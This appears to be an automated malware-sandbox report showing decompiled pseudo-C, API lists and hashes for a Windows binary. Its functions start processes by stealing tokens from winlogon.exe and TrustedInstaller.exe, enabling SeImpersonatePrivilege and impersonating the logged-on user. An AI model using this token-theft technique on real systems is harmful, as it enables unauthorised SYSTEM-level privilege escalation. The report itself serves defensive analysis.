									_t95 =  *0x40fa74; // 0x4101c8
									E00408910(_t95 + 0x10, _t159, 0x416f60);
									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
									_t198 =  *0x40fa74; // 0x4101c8
									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
									E00402F31(1);
									__imp__CoUninitialize();
								} else {
									E004065BE(_t159);
								}
								goto L7;
							} else {
								_t64 = _t92 + 0x10; // 0x4101d8
								_a7356 = _t156;
								_a7352 = _t156;
								_a7340 = _t156;
								_a7344 = _t156;
								_a7348 = _t156;
								_t156 = E00401D40(_t179, _t64,  &_a5292);
								_t110 =  &_a5288;
								L6:
								E004035FB(_t110);
								L7:
								E004054B9( &_v0);
								E004099D4( &_a32);
								E004054B9( &_v0);
								_t106 = _t156;
								goto L2;
							}
						}
						_t26 = _t86 + 1; // 0x1
						_t173 = _t26;
						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
						if(__eflags == 0) {
							E00402F31(_t156);
						} else {
							E00402FC6(_t173, __eflags, _t138);
						}
						_t188 =  *0x40fa74; // 0x4101c8
						_a68 =  &_a8;
						_a60 = 0x40cb0c;
						_a72 = _t156;
						_a64 = _t156;
						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
						_t190 =  *0x40fa74; // 0x4101c8
						_a5280 = _t156;
						_a5276 = _t156;
						_a5264 = _t156;
						_a5268 = _t156;
						_a5272 = _t156;
						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
						_t110 =  &_a3212;
						goto L6;
					}
					__eflags = _a56 - 3;
					if(_a56 != 3) {
						goto L8;
					}
					__eflags = 1;
					_a3212 = 0;
					_a3208 = 0;
					_a3196 = 0;
					_a3200 = 0;
					_a3204 = 0;
					_v4 = 0;
					_v0 = 0;
					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
					_t177 = 2;
					_push(E0040584C( &_v0, _t177));
					L0040B1F8();
					_pop(_t178);
					_t156 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152);
					_t110 =  &_a1132;
					goto L6;
				} else {
					_t106 = _t76 + 1;
					L2:
					return _t106;
				}
			}




































                                                                                                        0x00408533
                                                                                                        0x00408533
                                                                                                        0x00408536
                                                                                                        0x0040853e
                                                                                                        0x00408546
                                                                                                        0x0040854d
                                                                                                        0x00408559
                                                                                                        0x00408563
                                                                                                        0x00408569
                                                                                                        0x00408572
                                                                                                        0x00408583
                                                                                                        0x0040858d
                                                                                                        0x00408595
                                                                                                        0x0040859e
                                                                                                        0x004085a2
                                                                                                        0x004085a6
                                                                                                        0x004085aa
                                                                                                        0x004085ae
                                                                                                        0x004085b8
                                                                                                        0x004085c1
                                                                                                        0x004085c8
                                                                                                        0x004085cd
                                                                                                        0x004085cf
                                                                                                        0x0040867f
                                                                                                        0x00408688
                                                                                                        0x0040868d
                                                                                                        0x0040868f
                                                                                                        0x00408730
                                                                                                        0x00408735
                                                                                                        0x00408737
                                                                                                        0x0040873d
                                                                                                        0x00408750
                                                                                                        0x0040875d
                                                                                                        0x00408763
                                                                                                        0x00408770
                                                                                                        0x00408775
                                                                                                        0x00408779
                                                                                                        0x0040878b
                                                                                                        0x00408790
                                                                                                        0x004087a2
                                                                                                        0x004087aa
                                                                                                        0x004087b8
                                                                                                        0x004087be
                                                                                                        0x004087c3
                                                                                                        0x004087c9
                                                                                                        0x004087d2
                                                                                                        0x004087df
                                                                                                        0x004087e3
                                                                                                        0x004087e6
                                                                                                        0x00408801
                                                                                                        0x004087e8
                                                                                                        0x004087f8
                                                                                                        0x004087fe
                                                                                                        0x00408811
                                                                                                        0x00408816
                                                                                                        0x00408816
                                                                                                        0x0040881c
                                                                                                        0x00408822
                                                                                                        0x00408779
                                                                                                        0x00408824
                                                                                                        0x00408829
                                                                                                        0x00408833
                                                                                                        0x00408834
                                                                                                        0x00408840
                                                                                                        0x00408848
                                                                                                        0x0040884c
                                                                                                        0x00408850
                                                                                                        0x00408855
                                                                                                        0x0040885a
                                                                                                        0x00408860
                                                                                                        0x004088ac
                                                                                                        0x004088b1
                                                                                                        0x004088b3
                                                                                                        0x004088bf
                                                                                                        0x004088c5
                                                                                                        0x004088cb
                                                                                                        0x004088da
                                                                                                        0x004088ea
                                                                                                        0x004088ed
                                                                                                        0x004088f8
                                                                                                        0x004088ff
                                                                                                        0x00408905
                                                                                                        0x004088b5
                                                                                                        0x004088b5
                                                                                                        0x004088b5
                                                                                                        0x00000000
                                                                                                        0x00408862
                                                                                                        0x00408862
                                                                                                        0x0040886d
                                                                                                        0x00408874
                                                                                                        0x0040887b
                                                                                                        0x00408882
                                                                                                        0x00408889
                                                                                                        0x00408895
                                                                                                        0x00408897
                                                                                                        0x00408658
                                                                                                        0x00408658
                                                                                                        0x0040865d
                                                                                                        0x00408661
                                                                                                        0x0040866a
                                                                                                        0x00408673
                                                                                                        0x00408678
                                                                                                        0x00000000
                                                                                                        0x00408678
                                                                                                        0x00408860
                                                                                                        0x00408695
                                                                                                        0x00408695
                                                                                                        0x0040869f
                                                                                                        0x004086a2
                                                                                                        0x004086af
                                                                                                        0x004086a4
                                                                                                        0x004086a7
                                                                                                        0x004086a7
                                                                                                        0x004086b4
                                                                                                        0x004086bf
                                                                                                        0x004086cb
                                                                                                        0x004086d3
                                                                                                        0x004086d7
                                                                                                        0x004086db
                                                                                                        0x004086e0
                                                                                                        0x004086f1
                                                                                                        0x004086f8
                                                                                                        0x004086ff
                                                                                                        0x00408706
                                                                                                        0x0040870d
                                                                                                        0x00408719
                                                                                                        0x0040871b
                                                                                                        0x00000000
                                                                                                        0x0040871b
                                                                                                        0x004085d5
                                                                                                        0x004085da
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004085ec
                                                                                                        0x004085ef
                                                                                                        0x004085f6
                                                                                                        0x004085fd
                                                                                                        0x00408604
                                                                                                        0x0040860b
                                                                                                        0x00408612
                                                                                                        0x00408616
                                                                                                        0x00408620
                                                                                                        0x0040862a
                                                                                                        0x00408632
                                                                                                        0x00408633
                                                                                                        0x00408638
                                                                                                        0x0040864f
                                                                                                        0x00408651
                                                                                                        0x00000000
                                                                                                        0x0040854f
                                                                                                        0x0040854f
                                                                                                        0x00408550
                                                                                                        0x00408556
                                                                                                        0x00408556

                                                                                                        APIs
                                                                                                          • Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                          • Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                          • Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                          • Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                        • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
                                                                                                        • GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
                                                                                                        • EnumResourceTypesW.KERNEL32 ref: 00408583
                                                                                                        • swscanf.MSVCRT ref: 00408620
                                                                                                        • _wtoi.MSVCRT ref: 00408633
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
                                                                                                        • String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
                                                                                                        • API String ID: 3933224404-3784219877
                                                                                                        • Opcode ID: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                                                        • Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
                                                                                                        • Opcode Fuzzy Hash: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                                                        • Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401FE6, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 243processCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 81%
                                                                                                        			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
				int _v8;
				long _v12;
				wchar_t* _v16;
				void _v546;
				long _v548;
				void _v1074;
				char _v1076;
				void* __esi;
				long _t84;
				int _t87;
				wchar_t* _t88;
				int _t92;
				void* _t93;
				int _t94;
				int _t96;
				int _t99;
				int _t104;
				long _t105;
				int _t110;
				void** _t112;
				int _t113;
				intOrPtr _t131;
				wchar_t* _t132;
				int* _t148;
				wchar_t* _t149;
				int _t151;
				void* _t152;
				void* _t153;
				int _t154;
				void* _t155;
				long _t160;

				_t145 = __edx;
				_t152 = __ecx;
				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
				_v12 = 0;
				if(_t131 != 4) {
					__eflags = _t131 - 5;
					if(_t131 != 5) {
						__eflags = _t131 - 9;
						if(__eflags != 0) {
							__eflags = _t131 - 8;
							if(_t131 != 8) {
								__eflags = _t131 - 6;
								if(_t131 != 6) {
									__eflags = _t131 - 7;
									if(_t131 != 7) {
										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
									} else {
										_t132 = __eax + 0x46b6;
										_t148 = __eax + 0x48b6;
										__eflags =  *_t148;
										_v16 = _t132;
										_v8 = __eax + 0x4ab6;
										if( *_t148 == 0) {
											_t88 = wcschr(_t132, 0x40);
											__eflags = _t88;
											if(_t88 != 0) {
												_t148 = 0;
												__eflags = 0;
											}
										}
										_t153 = _t152 + 0x800;
										E0040289F(_t153);
										_t154 =  *(_t153 + 0xc);
										__eflags = _t154;
										if(_t154 == 0) {
											_t87 = 0;
											__eflags = 0;
										} else {
											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
										}
										__eflags = _t87;
									}
									if(__eflags == 0) {
										_t84 = GetLastError();
										L43:
										_v12 = _t84;
									}
									goto L44;
								}
								__eflags = E00401D99(__eax + 0x44ac, __edx);
								if(__eflags == 0) {
									goto L44;
								}
								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
								__eflags = _t92;
								if(_t92 != 0) {
									goto L44;
								}
								_t84 = _a28;
								goto L43;
							}
							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
							__eflags = _t93;
							if(_t93 != 0) {
								E00401306(_t93); // executed
							}
							_v8 = 0;
							_t94 = E00401F04(_t145, _t152); // executed
							__eflags = _t94;
							_v12 = _t94;
							if(__eflags == 0) {
								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
								__eflags = _t96;
								_v12 = _t96;
								if(_t96 == 0) {
									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
									__eflags = _t99;
									if(_t99 == 0) {
										_v12 = GetLastError();
									}
									CloseHandle(_v8); // executed
								}
								RevertToSelf(); // executed
							}
							goto L44;
						}
						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
						__eflags = _t104;
						if(_t104 == 0) {
							goto L44;
						}
						_v8 = 0;
						_t105 = E00401E44(_t152, _t104,  &_v8);
						goto L14;
					}
					_t149 = __eax + 0x44ac;
					_t110 = wcslen(_t149);
					__eflags = _t110;
					if(_t110 <= 0) {
						goto L44;
					} else {
						_v8 = 0;
						__eflags = E00404EA9(_t149, _t110);
						_t112 =  &_v8;
						_push(_t112);
						_push(_t149);
						if(__eflags == 0) {
							_push(_t152);
							_t113 = E00401DF9(_t145, __eflags);
						} else {
							L0040B1F8();
							_push(_t112);
							_push(_t152);
							_t113 = E00401E44();
						}
						_v12 = _t113;
						__eflags = _t113;
						goto L15;
					}
				} else {
					_v548 = 0;
					memset( &_v546, 0, 0x208);
					_v1076 = 0;
					memset( &_v1074, 0, 0x208);
					E00404C3C( &_v548);
					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
					_t151 = wcslen(??);
					_t10 = wcslen( &_v548) + 1; // 0x1
					_t159 = _t151 + _t10 - 0x104;
					if(_t151 + _t10 >= 0x104) {
						_v1076 = 0;
					} else {
						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
					}
					_v8 = 0;
					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
					L14:
					_t160 = _t105;
					_v12 = _t105;
					L15:
					if(_t160 == 0) {
						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
							_v12 = GetLastError();
						}
						CloseHandle(_v8);
					}
					L44:
					return _v12;
				}
			}


































                                                                                                        0x00401fe6
                                                                                                        0x00401ff1
                                                                                                        0x00401ff3
                                                                                                        0x00401fff
                                                                                                        0x00402002
                                                                                                        0x004020a8
                                                                                                        0x004020ab
                                                                                                        0x004020f3
                                                                                                        0x004020f6
                                                                                                        0x00402162
                                                                                                        0x00402165
                                                                                                        0x004021f2
                                                                                                        0x004021f5
                                                                                                        0x00402235
                                                                                                        0x00402238
                                                                                                        0x004022be
                                                                                                        0x0040223a
                                                                                                        0x0040223a
                                                                                                        0x00402240
                                                                                                        0x0040224b
                                                                                                        0x0040224e
                                                                                                        0x00402251
                                                                                                        0x00402254
                                                                                                        0x00402259
                                                                                                        0x0040225e
                                                                                                        0x00402262
                                                                                                        0x00402264
                                                                                                        0x00402264
                                                                                                        0x00402264
                                                                                                        0x00402262
                                                                                                        0x00402266
                                                                                                        0x0040226c
                                                                                                        0x00402271
                                                                                                        0x00402274
                                                                                                        0x00402276
                                                                                                        0x0040229a
                                                                                                        0x0040229a
                                                                                                        0x00402278
                                                                                                        0x00402296
                                                                                                        0x00402296
                                                                                                        0x0040229c
                                                                                                        0x0040229c
                                                                                                        0x004022c0
                                                                                                        0x004022c2
                                                                                                        0x004022c8
                                                                                                        0x004022c8
                                                                                                        0x004022c8
                                                                                                        0x00000000
                                                                                                        0x004022c0
                                                                                                        0x00402201
                                                                                                        0x00402203
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402220
                                                                                                        0x00402225
                                                                                                        0x00402227
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040222d
                                                                                                        0x00000000
                                                                                                        0x0040222d
                                                                                                        0x00402173
                                                                                                        0x00402179
                                                                                                        0x0040217b
                                                                                                        0x0040217e
                                                                                                        0x00402183
                                                                                                        0x00402185
                                                                                                        0x00402188
                                                                                                        0x0040218d
                                                                                                        0x0040218f
                                                                                                        0x00402192
                                                                                                        0x004021a2
                                                                                                        0x004021a7
                                                                                                        0x004021a9
                                                                                                        0x004021ac
                                                                                                        0x004021cc
                                                                                                        0x004021d1
                                                                                                        0x004021d3
                                                                                                        0x004021db
                                                                                                        0x004021db
                                                                                                        0x004021e1
                                                                                                        0x004021e1
                                                                                                        0x004021e7
                                                                                                        0x004021e7
                                                                                                        0x00000000
                                                                                                        0x00402192
                                                                                                        0x004020fe
                                                                                                        0x00402103
                                                                                                        0x00402105
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402111
                                                                                                        0x00402114
                                                                                                        0x00000000
                                                                                                        0x00402114
                                                                                                        0x004020ad
                                                                                                        0x004020b4
                                                                                                        0x004020b9
                                                                                                        0x004020bc
                                                                                                        0x00000000
                                                                                                        0x004020c2
                                                                                                        0x004020c4
                                                                                                        0x004020ce
                                                                                                        0x004020d0
                                                                                                        0x004020d3
                                                                                                        0x004020d4
                                                                                                        0x004020d5
                                                                                                        0x004020e6
                                                                                                        0x004020e7
                                                                                                        0x004020d7
                                                                                                        0x004020d7
                                                                                                        0x004020dd
                                                                                                        0x004020de
                                                                                                        0x004020df
                                                                                                        0x004020df
                                                                                                        0x004020ec
                                                                                                        0x004020ef
                                                                                                        0x00000000
                                                                                                        0x004020ef
                                                                                                        0x00402008
                                                                                                        0x00402016
                                                                                                        0x0040201d
                                                                                                        0x0040202e
                                                                                                        0x00402035
                                                                                                        0x00402044
                                                                                                        0x00402049
                                                                                                        0x00402055
                                                                                                        0x00402064
                                                                                                        0x00402068
                                                                                                        0x0040206e
                                                                                                        0x0040208b
                                                                                                        0x00402070
                                                                                                        0x00402082
                                                                                                        0x00402088
                                                                                                        0x0040209e
                                                                                                        0x004020a1
                                                                                                        0x00402119
                                                                                                        0x00402119
                                                                                                        0x0040211b
                                                                                                        0x0040211e
                                                                                                        0x0040211e
                                                                                                        0x00402149
                                                                                                        0x00402151
                                                                                                        0x00402151
                                                                                                        0x00402157
                                                                                                        0x00402157
                                                                                                        0x004022cb
                                                                                                        0x004022d2
                                                                                                        0x004022d2

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040201D
                                                                                                        • memset.MSVCRT ref: 00402035
                                                                                                          • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                          • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                        • wcslen.MSVCRT ref: 00402050
                                                                                                        • wcslen.MSVCRT ref: 0040205F
                                                                                                        • wcslen.MSVCRT ref: 004020B4
                                                                                                        • _wtoi.MSVCRT ref: 004020D7
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
                                                                                                        • RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7
                                                                                                          • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                          • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                          • Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
                                                                                                          • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
                                                                                                          • Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
                                                                                                          • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
                                                                                                          • Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                          • Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                          • Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                          • Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                          • Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                          • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                          • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                        • wcschr.MSVCRT ref: 00402259
                                                                                                        • CreateProcessW.KERNEL32 ref: 004022B8
                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 004022C2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
                                                                                                        • String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
                                                                                                        • API String ID: 3201562063-2355939583
                                                                                                        • Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                        • Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
                                                                                                        • Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                        • Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00409921, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00409921(struct HINSTANCE__** __esi) {
				void* _t6;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t12;
				CHAR* _t13;
				intOrPtr* _t17;

				if( *__esi == 0) {
					_t7 = E00405436(L"psapi.dll"); // executed
					 *_t17 = "GetModuleBaseNameW";
					 *__esi = _t7;
					__esi[1] = GetProcAddress(_t7, _t13);
					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
					__esi[3] = _t12;
					return _t12;
				}
				return _t6;
			}








                                                                                                        0x00409924
                                                                                                        0x0040992c
                                                                                                        0x00409937
                                                                                                        0x0040993f
                                                                                                        0x0040994a
                                                                                                        0x00409956
                                                                                                        0x00409962
                                                                                                        0x0040996e
                                                                                                        0x00409971
                                                                                                        0x00409973
                                                                                                        0x00000000
                                                                                                        0x00409976
                                                                                                        0x00409977

                                                                                                        APIs
                                                                                                          • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                          • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                          • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                          • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                        • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                        • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                        • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                        • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                        • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$LibraryLoad$memsetwcscat
                                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                        • API String ID: 1529661771-70141382
                                                                                                        • Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                        • Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
                                                                                                        • Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                        • Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040B2C6, Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                        • String ID:
                                                                                                        • API String ID: 2827331108-0
                                                                                                        • Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                        • Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
                                                                                                        • Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                        • Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00401F04, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 90%
                                                                                                        			E00401F04(void* __edx, intOrPtr _a4) {
				int _v8;
				void _v538;
				long _v540;
				void _v1066;
				char _v1068;
				long _t30;
				int _t33;
				int _t39;
				void* _t42;
				void* _t45;
				long _t49;

				_t45 = __edx;
				_v540 = 0;
				memset( &_v538, 0, 0x208);
				_v1068 = 0;
				memset( &_v1066, 0, 0x208);
				E00404C3C( &_v540);
				_t48 = L"winlogon.exe";
				_t39 = wcslen(L"winlogon.exe");
				_t8 = wcslen( &_v540) + 1; // 0x1
				_t53 = _t39 + _t8 - 0x104;
				_pop(_t42);
				if(_t39 + _t8 >= 0x104) {
					_v1068 = 0;
				} else {
					E00404BE4( &_v1068,  &_v540, _t48);
					_pop(_t42);
				}
				_v8 = 0;
				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
				_t49 = _t30;
				_t54 = _t49;
				if(_t49 == 0) {
					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
					_t33 = ImpersonateLoggedOnUser(_v8); // executed
					if(_t33 == 0) {
						_t49 = GetLastError();
					}
					CloseHandle(_v8);
				}
				return _t49;
			}














                                                                                                        0x00401f04
                                                                                                        0x00401f20
                                                                                                        0x00401f27
                                                                                                        0x00401f38
                                                                                                        0x00401f3f
                                                                                                        0x00401f4e
                                                                                                        0x00401f54
                                                                                                        0x00401f5f
                                                                                                        0x00401f6e
                                                                                                        0x00401f72
                                                                                                        0x00401f77
                                                                                                        0x00401f78
                                                                                                        0x00401f91
                                                                                                        0x00401f7a
                                                                                                        0x00401f88
                                                                                                        0x00401f8e
                                                                                                        0x00401f8e
                                                                                                        0x00401fa6
                                                                                                        0x00401fa9
                                                                                                        0x00401fae
                                                                                                        0x00401fb0
                                                                                                        0x00401fb2
                                                                                                        0x00401fb9
                                                                                                        0x00401fc2
                                                                                                        0x00401fca
                                                                                                        0x00401fd2
                                                                                                        0x00401fd2
                                                                                                        0x00401fd7
                                                                                                        0x00401fd7
                                                                                                        0x00401fe3

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00401F27
                                                                                                        • memset.MSVCRT ref: 00401F3F
                                                                                                          • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                          • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                        • wcslen.MSVCRT ref: 00401F5A
                                                                                                        • wcslen.MSVCRT ref: 00401F69
